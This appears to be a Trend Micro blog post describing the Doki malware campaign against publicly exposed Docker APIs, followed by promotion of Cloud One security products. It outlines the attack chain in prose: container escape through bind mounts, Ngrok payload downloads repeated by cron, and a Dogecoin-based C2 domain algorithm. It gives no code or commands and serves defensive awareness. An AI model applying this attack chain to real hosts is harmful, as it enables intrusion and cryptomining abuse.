The global rush to move resources and infrastructure to the cloud as a result of Covid-19 has moved the attack surface from on-premise environments to the cloud. In many cases this same rush has created attack surfaces that IT Security departments have never been tasked with protecting. IT Security departments are comfortable with on-premise DevOps teams developing and publishing their apps and services internally or even publishing production ready services and containers to the cloud. With the build pipeline being moved completely to the cloud security teams do not always understand the associated security risks.
Recently a new type of Linux malware named “DOKI” has been discovered exploiting publicly accessible Docker API’s hosted in all major cloud providers. The manner in which threat actors are gaining access to container environments is a previously discovered technique, but the DOKI malware is something that has not been documented until now.
In order to drop the DOKI malware on a container host threat actors scan cloud provider networks for publicly accessible Docker API’s and gain access to the Docker environment through this same API. Once the threat actor gains access they begin to spin up their own unique containers and delete logs relating to their activity. One aspect of this attack technique involves spinning up alpine images with curl installed. The image itself is not malicious, but with curl installed the attacker can use the container to perform malicious activity remotely. Since the attacker is using a publicly accessible container image, typical container registry scanning solutions would see the container as clean and would allow it to be built and published.
This is simply the first step in the attack chain, the attacker cannot yet execute malware on the container host machine which is the end result they are looking for. In order for the execution to take place the attacker has to escape the container. In this case the attacker uses the bind parameter which is included in the create API request. The attacker then binds a /tmpxxxx directory on the root of the host machine and gains access to run any file that resides in that directory on the host machine.
Additionally, through the service Ngrok the attacker generates unique URL’s with short life spans to download payloads to the curl-based images that the attacker had previously created. The attacker has also taken control of the cron utility on the host and repeats this download every minute. Most of the malware observed was known crypto miners and various known malware binaries. The most recent occurrences included the newly discovered Doki malware.
Doki malware has a few components that make it very unique. The most unique behavior of this malware is that it uses a combination of DynDNS and a unique Domain Generation Algorithm based on Dogecoin to find the domain of its C2 in real time. This is behavior that has not been observed in malware until now. The attacker controls what URL the malware contacts by transferring Dogecoin from their wallet. Using this technique makes the attack very resilient to any sort of action from domain filtering services or other types of security products that are in place. It is also a notable advancement that the attacker is controlling the URL by transferring Dogecoin to their wallet.
Even though this attack is unique, the approach to detecting attacks such as this does not change. Using a layered Security approach, touching all points where data moves or is generated is the best way to secure environments. The Trend Micro Cloud One platform is built for cloud builders and can secure all points of an attack such as those used in the Doki malware. For this specific attack the Docker API was the point of entry. Protecting this point of entry is where most companies choose to secure their environments, and unfortunately, many organizations are not able to expand their security due to budget restraints or lack of knowledge of applicable products. In utilizing the Trend Micro Cloud One suite of products we not only protect cloud environments but also give enterprises visibility into the entire attack chain and allow them to assess what was done, and when. This includes at runtime and within containers, which require security controls independent of an endpoint on a user device or cloud instance.
For this attack in particular, Cloud One Application Security would be the first line of defense for protecting the Docker API from exploitation. This specific control within Cloud One can run security as code and help to detect any compromise at the Docker API level. The next layer of protection that Cloud One can provide is Cloud One Container protection. This control would detect foreign containers being generated in the CI/CD pipeline and prevent them from being published to production environments. Finally, Cloud One Workload Security has the ability to detect an exploit being run on the container host. If an attacker is able to evade the previous controls, Workload Security would detect anything from malware on the host to unusual services being spun up on the host.
The Trend Micro Cloud One platform offers cloud security services focused on threats affecting your cloud infrastructure. Cloud One provides protection for Cloud Workloads, Containers, Cloud Applications, File Storage Security, Adherence to Cloud best practice standards and Cloud Native network inspection. Each component touches on a different attack surface in the Cloud and is backed by Trend Micro’s world class threat research and threat intelligence partnerships. Furthermore, the Cloud One platform gives enterprises the ability to secure Hybrid Cloud environments by securing on-premise and cloud-based workloads from a single console.
Securing the cloud requires protection against old threats targeting a new attack surface, and new threats designed specifically for cloud-native applications – like Doki malware. No matter the threat or attack surface, we understand all sides of hybrid cloud environments and have built tools that meet the needs of IT security and DevOps teams alike.